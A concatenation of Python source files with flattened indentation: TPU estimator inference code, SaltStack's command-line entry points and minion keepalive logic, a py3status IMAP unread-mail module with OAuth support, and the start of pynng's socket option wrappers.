while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = tf.nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = tf.nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tf.compat.v1.tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = tf.nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = tf.nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@tf.nondifferentiable_batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tf.compat.v1.tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
scripts.py
|
# -*- coding: utf-8 -*-
"""
This module contains the function calls to execute command line scripts
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import functools
import logging
import os
import signal
import sys
import threading
import time
import traceback
from random import randint
import salt.defaults.exitcodes # pylint: disable=unused-import
import salt.ext.six as six
# Import salt libs
from salt.exceptions import SaltClientError, SaltReqTimeoutError, SaltSystemExit
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=""):
"""
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
"""
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
try:
# This raises AttributeError on Python 3.4 and 3.5 if there is no current exception.
# Ref: https://bugs.python.org/issue23003
trace = traceback.format_exc()
except AttributeError:
trace = ""
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
if signum == signal.SIGINT:
exit_msg = "\nExiting gracefully on Ctrl-c"
try:
jid = client.local_client.pub_data["jid"]
exit_msg += (
"\n"
"This job's jid is: {0}\n"
"The minions may not have all finished running and any remaining "
"minions will return upon completion. To look up the return data "
"for this job later, run the following command:\n\n"
"salt-run jobs.lookup_jid {0}".format(jid)
)
except (AttributeError, KeyError):
pass
else:
exit_msg = None
_handle_interrupt(
SystemExit(exit_msg),
Exception("\nExiting with hard crash on Ctrl-c"),
hardcrash,
trace=trace,
)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
def salt_master():
"""
Start the salt master.
"""
import salt.cli.daemons
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != "__main__":
sys.modules["__main__"] = sys.modules[__name__]
# REMOVEME after Python 2.7 support is dropped (also the six import)
if six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until(
"3001",
"Python 2.7 will reach the end of its life on January 1st,"
" 2020. Please upgrade your Python as Python 2.7 won't be"
" maintained after that date. Salt will drop support for"
" Python 2.7 in the 3001 release or later.",
)
# END REMOVEME
master = salt.cli.daemons.Master()
master.start()
def minion_process():
"""
Start a minion process
"""
import salt.utils.platform
import salt.utils.process
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.process.appendproctitle("KeepAlive")
def handle_hup(manager, sig, frame):
manager.minion.reload()
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
"""
Have the minion suicide if the parent process is gone
NOTE: small race issue where the parent PID could be replace
with another process with same PID!
"""
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.platform.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error("Minion process encountered exception: %s", exc)
os._exit(salt.defaults.exitcodes.EX_GENERIC)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(
target=suicide_when_without_parent, args=(os.getppid(),)
)
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP, functools.partial(handle_hup, minion))
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
lock.acquire(blocking=True)
log.warning(
"Fatal functionality error caught by minion handler:\n", exc_info=True
)
log.warning("** Restarting minion **")
delay = 60
if minion is not None and hasattr(minion, "config"):
delay = minion.config.get("random_reauth_delay", 60)
delay = randint(1, delay)
log.info("waiting random_reauth_delay %ss", delay)
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
finally:
lock.acquire(blocking=True)
def salt_minion():
"""
Start the salt minion in a subprocess.
Auto restart minion on error.
"""
import signal
import salt.utils.platform
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != "__main__":
sys.modules["__main__"] = sys.modules[__name__]
if "" in sys.path:
sys.path.remove("")
if salt.utils.platform.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
# REMOVEME after Python 2.7 support is dropped (also the six import)
elif six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until(
"3001",
"Python 2.7 will reach the end of its life on January 1st,"
" 2020. Please upgrade your Python as Python 2.7 won't be"
" maintained after that date. Salt will drop support for"
" Python 2.7 in the 3001 release or later.",
)
# END REMOVEME
if "--disable-keepalive" in sys.argv:
sys.argv.remove("--disable-keepalive")
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(
pid, signum, sigframe
): # pylint: disable=unused-argument
"""
Escalate the signal received to the multiprocessing process that
is actually running the minion
"""
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(
signal.SIGTERM,
functools.partial(escalate_signal_to_process, process.pid),
)
signal.signal(
signal.SIGINT,
functools.partial(escalate_signal_to_process, process.pid),
)
signal.signal(
signal.SIGHUP,
functools.partial(escalate_signal_to_process, process.pid),
)
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST, reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
# ontop of the random_reauth_delay already preformed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
"""
Start a proxy minion process
"""
import salt.cli.daemons
import salt.utils.platform
# salt_minion spawns this function in a new process
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
"""
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
"""
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(
target=suicide_when_without_parent, args=(os.getppid(),)
)
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
# pylint: disable=broad-except
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit,) as exc:
# pylint: enable=broad-except
log.error("Proxy Minion failed to start: ", exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
finally:
lock.acquire(blocking=True)
if restart is True:
log.warning("** Restarting proxy minion **")
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, "config"):
delay = proxyminion.config.get("random_reauth_delay", 60)
random_delay = randint(1, delay)
log.info("Sleeping random_reauth_delay of %s seconds", random_delay)
# preform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy():
"""
Start a proxy minion.
"""
import salt.cli.daemons
import salt.utils.platform
import multiprocessing
if "" in sys.path:
sys.path.remove("")
if salt.utils.platform.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if "--disable-keepalive" in sys.argv:
sys.argv.remove("--disable-keepalive")
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception: # pylint: disable=broad-except
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception: # pylint: disable=broad-except
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
"""
Start the salt syndic.
"""
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
"""
Manage the authentication keys with salt-key.
"""
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err: # pylint: disable=broad-except
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
"""
Publish commands to the salt system from the command line on the
master.
"""
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
"""
Directly call a salt command in the modules, does not require a running
salt minion to run.
"""
import salt.cli.call
if "" in sys.path:
sys.path.remove("")
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
"""
Execute a salt convenience routine.
"""
import salt.cli.run
if "" in sys.path:
sys.path.remove("")
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
"""
Execute the salt-ssh system
"""
import salt.cli.ssh
if "" in sys.path:
sys.path.remove("")
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(SystemExit(err), err, hardcrash, trace=trace)
def salt_cloud():
"""
The main function for salt-cloud
"""
# Define 'salt' global so we may use it after ImportError. Otherwise,
# UnboundLocalError will be raised.
global salt # pylint: disable=W0602
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
except ImportError as e:
# No salt cloud on Windows
log.error("Error importing salt cloud: %s", e)
print("salt-cloud is not available in this system")
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
if "" in sys.path:
sys.path.remove("")
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
"""
The main function for salt-api
"""
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
"""
Publish commands to the salt system from the command line on the
master.
"""
import salt.cli.salt
if "" in sys.path:
sys.path.remove("")
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
"""
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
"""
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
"""
Quickstart for developing on the saltstack installation
.. versionadded:: 2016.11.0
"""
import salt.utils.extend
salt.utils.extend.run(
extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge,
)
def salt_unity():
"""
Change the args and redirect to another salt script
"""
avail = []
for fun in dir(sys.modules[__name__]):
if fun.startswith("salt"):
avail.append(fun[5:])
if len(sys.argv) < 2:
msg = "Must pass in a salt command, available commands are:"
for cmd in avail:
msg += "\n{0}".format(cmd)
print(msg)
sys.exit(1)
cmd = sys.argv[1]
if cmd not in avail:
# Fall back to the salt command
sys.argv[0] = "salt"
s_fun = salt_main
else:
sys.argv[0] = "salt-{0}".format(cmd)
sys.argv.pop(1)
s_fun = getattr(sys.modules[__name__], "salt_{0}".format(cmd))
s_fun()
|
imap.py
|
"""
Display number of unread messages from IMAP account.
Configuration parameters:
allow_urgent: display urgency on unread messages (default False)
auth_scope: scope to use with OAuth2 (default 'https://mail.google.com/')
auth_token: path to where the pickled access/refresh token will be saved
after successful credential authorization.
(default '~/.config/py3status/imap_auth_token.pickle')
cache_timeout: refresh interval for this module (default 60)
client_secret: the path to the client secret file with OAuth 2.0
credentials (if None then OAuth not used) (default None)
criterion: status of emails to check for (default 'UNSEEN')
debug: log warnings (default False)
degraded_when_stale: color as degraded when updating failed (default True)
format: display format for this module (default 'Mail: {unseen}')
hide_if_zero: hide this module when no new mail (default False)
mailbox: name of the mailbox to check (default 'INBOX')
password: login password (default None)
port: number to use (default '993')
read_timeout: timeout for read(2) syscalls (default 5)
security: login authentication method: 'ssl' or 'starttls'
(startssl needs python 3.2 or later) (default 'ssl')
server: server to connect (default None)
use_idle: use IMAP4 IDLE instead of polling; requires compatible
server; uses cache_timeout for IDLE's timeout; will auto detect
when set to None (default None)
user: login user (default None)
Format placeholders:
{unseen} number of unread emails
Color options:
color_new_mail: use color when new mail arrives, default to color_good
OAuth:
OAuth2 will be used for authentication instead of a password if the
client_secret path is set.
To create a client_secret for your Google account, visit
https://console.developers.google.com/ and create an "OAuth client ID" from
the credentials tab.
This client secret enables the app (in this case, the IMAP py3status module)
to request access to a user's email. Therefore the client secret doesn't
have to be for the same Google account as the email account being accessed.
When the IMAP module first tries to access your email account a browser
window will open asking for authorization to access your email.
After authorization is complete, an access/refresh token will be saved to
the path configured in auth_token.
Requires: Using OAuth requires the google-auth and google-auth-oauthlib
libraries to be installed.
Note: the same client secret file can be used as with the py3status Google
Calendar module.
@author obb, girst
SAMPLE OUTPUT
{'full_text': 'Mail: 36', 'color': '#00FF00'}
"""
import imaplib
from threading import Thread
from time import sleep
from ssl import create_default_context
from socket import setdefaulttimeout, error as socket_error
from pathlib import Path
STRING_UNAVAILABLE = "N/A"
NO_DATA_YET = -1
class Py3status:
""""""
# available configuration parameters
allow_urgent = False
auth_scope = "https://mail.google.com/"
auth_token = "~/.config/py3status/imap_auth_token.pickle"
cache_timeout = 60
client_secret = None
criterion = "UNSEEN"
debug = False
degraded_when_stale = True
format = "Mail: {unseen}"
hide_if_zero = False
mailbox = "INBOX"
password = None
port = "993"
read_timeout = 5
security = "ssl"
server = None
use_idle = None
user = None
class Meta:
deprecated = {
"rename": [
{
"param": "new_mail_color",
"new": "color_new_mail",
"msg": "obsolete parameter use `color_new_mail`",
},
{
"param": "imap_server",
"new": "server",
"msg": "obsolete parameter use `server`",
},
]
}
def post_config_hook(self):
# class variables:
self.mail_count = NO_DATA_YET
self.connection = None
self.mail_error = None # cannot throw self.py3.error from thread
self.network_error = None
self.command_tag = (
0 # IMAPcommands are tagged, so responses can be matched up to requests
)
self.idle_thread = Thread()
if self.client_secret:
self.client_secret = Path(self.client_secret).expanduser()
self.auth_token = Path(self.auth_token).expanduser()
if self.security not in ["ssl", "starttls"]:
raise ValueError("Unknown security protocol")
def imap(self):
# I -- acquire mail_count
if self.use_idle is not False:
if not self.idle_thread.is_alive():
sleep(
self.read_timeout
) # rate-limit thread-restarting (when network is offline)
self.idle_thread = Thread(target=self._get_mail_count)
self.idle_thread.daemon = True
self.idle_thread.start()
else:
self._get_mail_count()
response = {"cached_until": self.py3.time_in(self.cache_timeout)}
if self.mail_error is not None:
self.py3.log(self.mail_error, level=self.py3.LOG_ERROR)
self.py3.error(self.mail_error)
self.mail_error = None
# II -- format response
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": self.mail_count}
)
if self.mail_count is None:
response["color"] = (self.py3.COLOR_BAD,)
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": STRING_UNAVAILABLE}
)
elif self.mail_count == NO_DATA_YET:
response["full_text"] = ""
elif self.mail_count == 0 and self.hide_if_zero:
response["full_text"] = ""
elif self.mail_count > 0:
response["color"] = self.py3.COLOR_NEW_MAIL or self.py3.COLOR_GOOD
response["urgent"] = self.allow_urgent
if self.network_error is not None and self.degraded_when_stale:
response["color"] = self.py3.COLOR_DEGRADED
return response
def _check_if_idle(self, connection):
supports_idle = "IDLE" in connection.capabilities
self.use_idle = supports_idle
self.py3.log("Will use {}".format("idling" if self.use_idle else "polling"))
if self.use_idle and not supports_idle:
self.py3.error("Server does not support IDLE")
def _get_creds(self):
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.auth.exceptions import TransportError
import pickle
self.creds = None
# Open pickle file with access and refresh tokens if it exists
if self.auth_token.exists():
with self.auth_token.open("rb") as token:
self.creds = pickle.load(token)
if not self.creds or not self.creds.valid:
try:
if self.creds and self.creds.expired and self.creds.refresh_token:
# Credentials expired but contain refresh token
self.creds.refresh(Request())
else:
# No valid credentials so open authorisation URL in browser
flow = InstalledAppFlow.from_client_secrets_file(
self.client_secret, [self.auth_scope]
)
self.creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with self.auth_token.open("wb") as token:
pickle.dump(self.creds, token)
except TransportError as e:
# Treat the same as a socket_error
raise socket_error(e)
def _connection_ssl(self):
if self.client_secret:
# Use OAUTH
self._get_creds()
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4_SSL(self.server, int(self.port))
return connection
def _connection_starttls(self):
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4(self.server, int(self.port))
connection.starttls(create_default_context())
return connection
def _connect(self):
if self.security == "ssl":
self.connection = self._connection_ssl()
elif self.security == "starttls":
self.connection = self._connection_starttls()
if self.use_idle is None:
self._check_if_idle(self.connection)
# trigger a socket.timeout if any IMAP request isn't completed in time:
self.connection.socket().settimeout(self.read_timeout)
def _disconnect(self):
try:
if self.connection is not None:
if self.connection.state == "SELECTED":
self.connection.close()
self.connection.logout()
except: # noqa e722
pass
finally:
self.connection = None
def _idle(self):
"""
since imaplib doesn't support IMAP4r1 IDLE, we'll do it by hand
"""
socket = None
try:
# build a new command tag (Xnnn) as bytes:
self.command_tag = (self.command_tag + 1) % 1000
command_tag = b"X" + bytes(str(self.command_tag).zfill(3), "ascii")
# make sure we have selected anything before idling:
directories = self.mailbox.split(",")
self.connection.select(directories[0])
socket = self.connection.socket()
# send IDLE command and check response:
socket.write(command_tag + b" IDLE\r\n")
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'IDLE' in time")
# Dovecot will responde with "+ idling", courier will return "+ entering idle mode"
# RFC 2177 (https://tools.ietf.org/html/rfc2177) only requires the "+" character.
if not response.lower().startswith("+"):
raise imaplib.IMAP4.abort(f"While initializing IDLE: {response}")
# wait for changes (EXISTS, EXPUNGE, etc.):
socket.settimeout(self.cache_timeout)
while True:
try:
response = socket.read(4096).decode("ascii")
if response.upper().startswith("* OK"):
continue # ignore '* OK Still here'
else:
break
except socket_error: # IDLE timed out
break
finally: # terminate IDLE command gracefully
if socket is None:
return
socket.settimeout(self.read_timeout)
socket.write(b"DONE\r\n") # important! Can't query IMAP again otherwise
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'DONE' in time")
# sometimes, more messages come in between reading and DONEing; so read them again:
if response.startswith("* "):
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort(
"Server sent more continuations, but no 'DONE' ack"
)
expected_response = (command_tag + b" OK").decode("ascii")
if not response.lower().startswith(expected_response.lower()):
raise imaplib.IMAP4.abort("While terminating IDLE: " + response)
def _get_mail_count(self):
retry_counter = 0
retry_max = 3
while True:
try:
if self.connection is None:
self._connect()
if self.connection.state == "NONAUTH":
if self.client_secret:
# Authenticate using OAUTH
auth_string = "user={}\1auth=Bearer {}\1\1".format(
self.user, self.creds.token
)
self.connection.authenticate("XOAUTH2", lambda x: auth_string)
else:
# Login with user and password
self.connection.login(self.user, self.password)
tmp_mail_count = 0
directories = self.mailbox.split(",")
for directory in directories:
self.connection.select(directory)
unseen_response = self.connection.search(None, self.criterion)
mails = unseen_response[1][0].split()
tmp_mail_count += len(mails)
self.mail_count = tmp_mail_count
self.network_error = None
if self.use_idle:
self.py3.update()
self._idle()
retry_counter = 0
else:
return
except (socket_error, imaplib.IMAP4.abort, imaplib.IMAP4.readonly) as e:
if "didn't respond to 'DONE'" in str(e) or isinstance(e, socket_error):
self.network_error = str(e)
error_type = "Network"
else:
error_type = "Recoverable"
# Note: we don't reset network_error, as we want this to persist
# until we either run into a permanent error or successfully receive
# another response from the IMAP server.
if self.debug:
self.py3.log(
f"{error_type} error - {e}", level=self.py3.LOG_WARNING,
)
self._disconnect()
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
f"Retrying ({retry_counter}/{retry_max})",
level=self.py3.LOG_INFO,
)
continue
break
except (imaplib.IMAP4.error, Exception) as e:
self.mail_error = f"Fatal error - {e}"
self._disconnect()
self.mail_count = None
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
"Will retry after 60 seconds ({}/{})".format(
retry_counter, retry_max
),
level=self.py3.LOG_INFO,
)
sleep(60)
continue
break
finally:
self.py3.update() # to propagate mail_error
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
nng.py
|
"""
Provides a Pythonic interface to cffi nng bindings
"""
import logging
import threading
import atexit
import pynng
from ._nng import ffi, lib
from .exceptions import check_err
from . import options
from . import _aio
logger = logging.getLogger(__name__)
__all__ = '''
ffi
Bus0
Pair0
Pair1
Pull0 Push0
Pub0 Sub0
Req0 Rep0
Socket
Surveyor0 Respondent0
'''.split()
# Register an atexit handler to call the nng_fini() cleanup function.
# This is necessary to ensure:
# * The Python interpreter doesn't finalize and kill the reap thread
# during a callback to _nng_pipe_cb
# * Cleanup background queue threads used by NNG
def _pynng_atexit():
lib.nng_fini()
atexit.register(_pynng_atexit)
def _ensure_can_send(thing):
"""
It's easy to accidentally pass in a str instead of bytes when send()ing.
This gives a more informative message if a ``str`` was accidentally passed
to a send method.
"""
# at some point it might be nice to check for the specific types we **can**
# send...
if isinstance(thing, str):
raise ValueError('Cannot send type str. '
'Maybe you left out a ".encode()" somewhere?')
def to_char(charlike):
"""Convert str or bytes to char*."""
# fast path for stuff that doesn't need to be changed.
if isinstance(charlike, ffi.CData):
return charlike
if isinstance(charlike, str):
charlike = charlike.encode()
charlike = ffi.new('char[]', charlike)
return charlike
class _NNGOption:
"""A descriptor for more easily getting/setting NNG option."""
# this class should not be instantiated directly! Instantiation will work,
# but getting/setting will fail.
# subclasses set _getter and _setter to the module-level getter and setter
# functions
_getter = None
_setter = None
def __init__(self, option_name):
self.option = to_char(option_name)
def __get__(self, instance, owner):
# have to look up the getter on the class
if self._getter is None:
raise TypeError("{} cannot be set".format(self.__class__))
return self.__class__._getter(instance, self.option)
def __set__(self, instance, value):
if self._setter is None:
raise TypeError("{} is readonly".format(self.__class__))
self.__class__._setter(instance, self.option, value)
class IntOption(_NNGOption):
"""Descriptor for getting/setting integer options"""
_getter = options._getopt_int
_setter = options._setopt_int
class MsOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_ms
_setter = options._setopt_ms
class SockAddrOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_sockaddr
class SizeOption(_NNGOption):
"""Descriptor for getting/setting size_t options"""
_getter = options._getopt_size
_setter = options._setopt_size
class StringOption(_NNGOption):
"""Descriptor for getting/setting string options"""
_getter = options._getopt_string
_setter = options._setopt_string
class BooleanOption(_NNGOption):
"""Descriptor for getting/setting boolean values"""
_getter = options._getopt_bool
_setter = options._setopt_bool
class PointerOption(_NNGOption):
"""Descriptor for setting pointer values"""
_setter = options._setopt_ptr
class NotImplementedOption(_NNGOption):
"""Represents a currently un-implemented option in Python."""
def __init__(self, option_name, errmsg):
super().__init__(option_name)
self.errmsg = errmsg
def __get__(self, instance, owner):
raise NotImplementedError(self.errmsg)
def __set__(self, instance, value):
raise NotImplementedError(self.errmsg)
class Socket:
"""
Open a socket with one of the scalability protocols. This should not be
instantiated directly; instead, one of its subclasses should be used.
There is one subclass per protocol. The available protocols are:
* :class:`Pair0`
